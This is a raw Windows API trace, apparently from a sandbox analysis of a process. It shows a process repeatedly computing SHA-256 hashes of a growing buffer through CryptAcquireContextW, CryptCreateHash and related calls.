	[0239.700] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.700] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.700] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0239.700] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.700] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c15e8
	[0239.700] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c15e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c15e8, pdwDataLen=0x128ba4) returned 1
	[0239.700] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.700] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.700] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.701] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.701] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0239.701] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.701] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1610
	[0239.701] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1610, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1610, pdwDataLen=0x128ba4) returned 1
	[0239.701] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.701] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.701] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.701] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.701] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0239.701] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.701] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1638
	[0239.701] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1638, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1638, pdwDataLen=0x128ba4) returned 1
	[0239.701] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.701] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.701] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.702] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.702] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0239.702] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.702] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1660
	[0239.702] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1660, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1660, pdwDataLen=0x128ba4) returned 1
	[0239.702] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.702] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.702] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.702] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.702] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0239.702] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.702] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1688
	[0239.702] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1688, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1688, pdwDataLen=0x128ba4) returned 1
	[0239.702] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.702] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.703] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.703] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.703] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0239.703] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.703] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c16b0
	[0239.703] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c16b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c16b0, pdwDataLen=0x128ba4) returned 1
	[0239.703] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.703] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.703] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.703] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.704] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0239.704] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.704] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c16d8
	[0239.704] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c16d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c16d8, pdwDataLen=0x128ba4) returned 1
	[0239.704] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.704] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.704] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.704] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.704] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0239.704] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.704] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1700
	[0239.704] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1700, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1700, pdwDataLen=0x128ba4) returned 1
	[0239.704] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.704] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.704] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.705] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.705] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0239.705] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.705] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1728
	[0239.705] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1728, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1728, pdwDataLen=0x128ba4) returned 1
	[0239.705] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.705] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.705] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.705] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.705] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0239.705] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.705] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1750
	[0239.705] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1750, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1750, pdwDataLen=0x128ba4) returned 1
	[0239.705] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.705] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.705] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.706] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.706] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0239.706] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.706] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1778
	[0239.706] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1778, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1778, pdwDataLen=0x128ba4) returned 1
	[0239.706] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.706] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.706] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.706] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.706] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0239.706] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.706] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c17a0
	[0239.706] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c17a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c17a0, pdwDataLen=0x128ba4) returned 1
	[0239.706] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.706] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.706] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.707] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.707] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0239.707] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.707] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c17c8
	[0239.707] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c17c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c17c8, pdwDataLen=0x128ba4) returned 1
	[0239.707] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.707] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.707] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.707] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.707] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0239.707] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.707] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c17f0
	[0239.707] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c17f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c17f0, pdwDataLen=0x128ba4) returned 1
	[0239.707] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.708] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.708] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.708] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.708] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0239.708] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.708] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1818
	[0239.708] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1818, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1818, pdwDataLen=0x128ba4) returned 1
	[0239.708] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.708] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.708] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.708] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.709] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0239.709] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.709] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1840
	[0239.709] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1840, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1840, pdwDataLen=0x128ba4) returned 1
	[0239.709] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.709] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.709] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.709] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.709] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0239.709] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.709] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1868
	[0239.709] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1868, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1868, pdwDataLen=0x128ba4) returned 1
	[0239.709] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.709] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.709] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.710] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.710] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0239.710] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.710] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1890
	[0239.710] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1890, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1890, pdwDataLen=0x128ba4) returned 1
	[0239.710] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.710] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.710] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.710] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.710] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0239.710] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.710] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c18b8
	[0239.711] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c18b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c18b8, pdwDataLen=0x128ba4) returned 1
	[0239.711] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.711] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.711] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.711] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.711] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0239.711] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.711] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c18e0
	[0239.711] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c18e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c18e0, pdwDataLen=0x128ba4) returned 1
	[0239.711] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.711] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.711] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.712] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.712] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0239.712] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.712] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1908
	[0239.712] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1908, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1908, pdwDataLen=0x128ba4) returned 1
	[0239.712] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.712] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.712] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.712] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.712] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0239.712] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.712] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1930
	[0239.712] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1930, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1930, pdwDataLen=0x128ba4) returned 1
	[0239.712] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.712] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.712] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.713] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.713] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0239.713] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.713] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1958
	[0239.713] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1958, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1958, pdwDataLen=0x128ba4) returned 1
	[0239.713] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.713] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.713] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.713] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.713] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0239.713] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.713] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1980
	[0239.714] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c1980, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1980, pdwDataLen=0x128ba4) returned 1
	[0239.714] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.714] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.714] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.714] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.714] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0239.714] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.714] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c19a8
	[0239.714] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c19a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c19a8, pdwDataLen=0x128ba4) returned 1
	[0239.714] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.714] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.714] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
